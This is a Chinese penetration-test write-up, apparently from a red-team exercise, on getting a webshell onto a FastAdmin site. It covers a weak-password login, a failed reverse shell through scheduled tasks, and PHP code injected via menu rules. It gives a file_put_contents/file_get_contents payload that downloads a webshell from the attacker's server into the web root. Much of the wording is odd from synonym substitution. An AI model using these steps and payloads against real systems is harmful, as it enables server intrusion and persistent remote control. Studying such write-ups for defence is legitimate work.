FastAdmin介绍
FastAdmin是基于ThinkPHP5和Bootstrap的极速后台研发框架,基于ThinkPHP行径功能实现的插件机制,持有丰富的插件和扩展,可直接在线安装卸载。
基于完善的Auth权限掌控管理、无限父子级权限分组、可自由分配子级权限、一个管理员可同期属于多个组别。
测试过程
在某次HVV的打点过程中,发掘某资产为FastAdmin搭建。下图为FastAdmin的报错页面,按照经验可判断该网站为FastAdmin搭建。
输入admin.php进入后台登录页面,弱口令进入后台。
进入后台找功能点getshell。后台默认会有插件管理功能,然则咱们在后台无找到这个功能,咱们直接拜访插件管理的位置 /admin/addon?ref=addtabs
理论上离线安装 Fileix文件管理器 ,而后上传一句话木马就能够getshell,然则很可惜失败了。
接着翻后台,发掘有按时任务功能,尝试反弹shell,写入反弹shell的语句后,在服务器上nc监听等待回连,然则发掘并无执行。
后面一看之前管理员设置过的按时任务亦无执行过,失败!
继续翻后台,发掘在菜单规则中能够创建规则要求,尝试在功能点中写入phpinfo()。
必须写在权限管理中!!!
而后来到管理员管理中,添加一个管理员。
所属组别必须为二级管理员组!!!
添加完成之后,重新用新添加的账户登录后台,能够发掘phpinfo()被成功执行。
经过搜索$_SERVER[‘DOCUMENT_ROOT’]获取网站根目录,为/www/wwwroot/xxxxxxxxx/
找到根路径后注销账户,准备一个webshell木马名为1.php,放在自己的服务器上,运用python起步一个临时web。 python3 -m http.server8080
在回到管理后台其中,在一样的位置写入如下语句,将远程服务器的webshell木马下载到网站根目录。 file_put_contents(/www/wwwroot/xxxxxxxxx/shell.php,file_get_contents(临时web位置/1.php))
保留完成后,再次运用刚才新创建的用户登录
webshell木马已被成功写入。
总结
在打点过程中, 经过指纹识别软件进行指纹识别进行相应的漏洞利用,在未识别出指纹的需人工判断,按照报错页面的样式识别指纹一种较好的办法。 整体打点过程:浏览网站—>发掘报错页面指纹为FastAdmin—>经过弱口令进入后台—>规则要求中写入phpinfo()—>得到网站根目录—>规则要求中写入webshell。文案源自:culprit(语雀)原文位置:https://www.yuque.com/culprit/note/nyvtuz排版:潇湘信安
黑白之道发布、转载的文案中所触及的技术、思路和工具仅供以安全为目的的学习交流运用,任何人不得将其用于违法用途及盈利等目的,否则后果自动承担!
如侵权请私聊咱们删文
END
多一个点在看多一条小鱼干
|